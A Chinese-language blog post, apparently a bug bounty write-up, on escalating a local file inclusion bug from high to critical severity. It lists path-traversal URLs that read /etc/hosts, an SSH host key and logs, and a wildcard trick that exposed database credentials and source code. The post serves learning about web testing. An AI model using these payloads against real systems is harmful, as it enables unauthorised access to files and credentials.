如何将LFI漏洞从高危升级为严重
2023-9-23 23:8:13 Author: mp.weixin.qq.com(查看原文) 阅读量:5 收藏

一位国外白帽子正在测试一个VDP程序,经过前期侦查后,他选择了对一个子域进行搜索。

打开Burp拦截请求,其中一个请求成功的引起了白帽小哥的注意。

https://target.tld/api/whitelabel/getFile?file=favico

白猫小哥开始尝试 LFI 并获取 /etc/passwd 文件,但响应均为空。

然后白帽小哥开始使用Seclists进行Fuzz:

https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI

https://target.tld/api/whitelabel/getFile?file=../../../../../../../../../../../../etc/hosts

https://target.tld/api/whitelabel/getFile?file=../../../../../../../../../../../../var/log/dmesg

https://target.tld/api/whitelabel/getFile?file=../../../../../../../../../../../../etc/ssh/ssh_host_dsa_key

https://target.tld/api/whitelabel/getFile?file=../../../../../../../../../../../../var/log/dpkg.log

generic

397 Bytes

© Guge's Blog


*/etc/hosts


*/etc/ssh/ssh_host_dsa_key

虽然没有大的影响,但LFI也算高危漏洞了,那么能否将漏洞级别提升至“严重级”呢?

hackerone上有不少这样的案例,比如以下这些:

根据这些案例报告,如果想将漏洞级别提升至“严重级”,需要找到一些‘特别’的东西,通过暴力破解似乎有点困难。

于是白帽小哥用特殊字符和 unicode 对内部端点进行Fuzz,并发现了一些有趣的东西。( * 字符可以返回每个目录中的所有文件)
比如下面这个请求:

https://target.tld/api/whitelabel/getFile?file=../../../../../../../../../../../../../../../var/www/*

generic

101 Bytes

© Guge's Blog


*数据库账号及密码

尝试登录看看,Bingo!

源码泄露:

这下漏洞的级别妥妥的“严重”了~

结果也确实没有令白帽小哥失望。

PS:关于 * 的用法,还可以这样使用:
/etc/apache2/*SOME-STRING
如果该字符串与该目录中的文件名的一部分匹配,则返回该文件。像下面这样:

如果你是一个长期主义者,欢迎加入我的知识星球(优先查看这个链接,里面可能还有优惠券),我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款

往期回顾

2022年度精选文章

SSRF研究笔记

xss研究笔记

dom-xss精选文章

Nuclei权威指南-如何躺赚

漏洞赏金猎人系列-如何测试设置功能IV

漏洞赏金猎人系列-如何测试注册功能以及相关Tips


文章来源: https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247492027&idx=1&sn=b3103bc423916d000130703a57b2e6e5&chksm=e8a5ebd8dfd262ced8661d5c4d3b144dc09149410c8badb3603ffe39ce2cdc2ed56608ae38e6&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh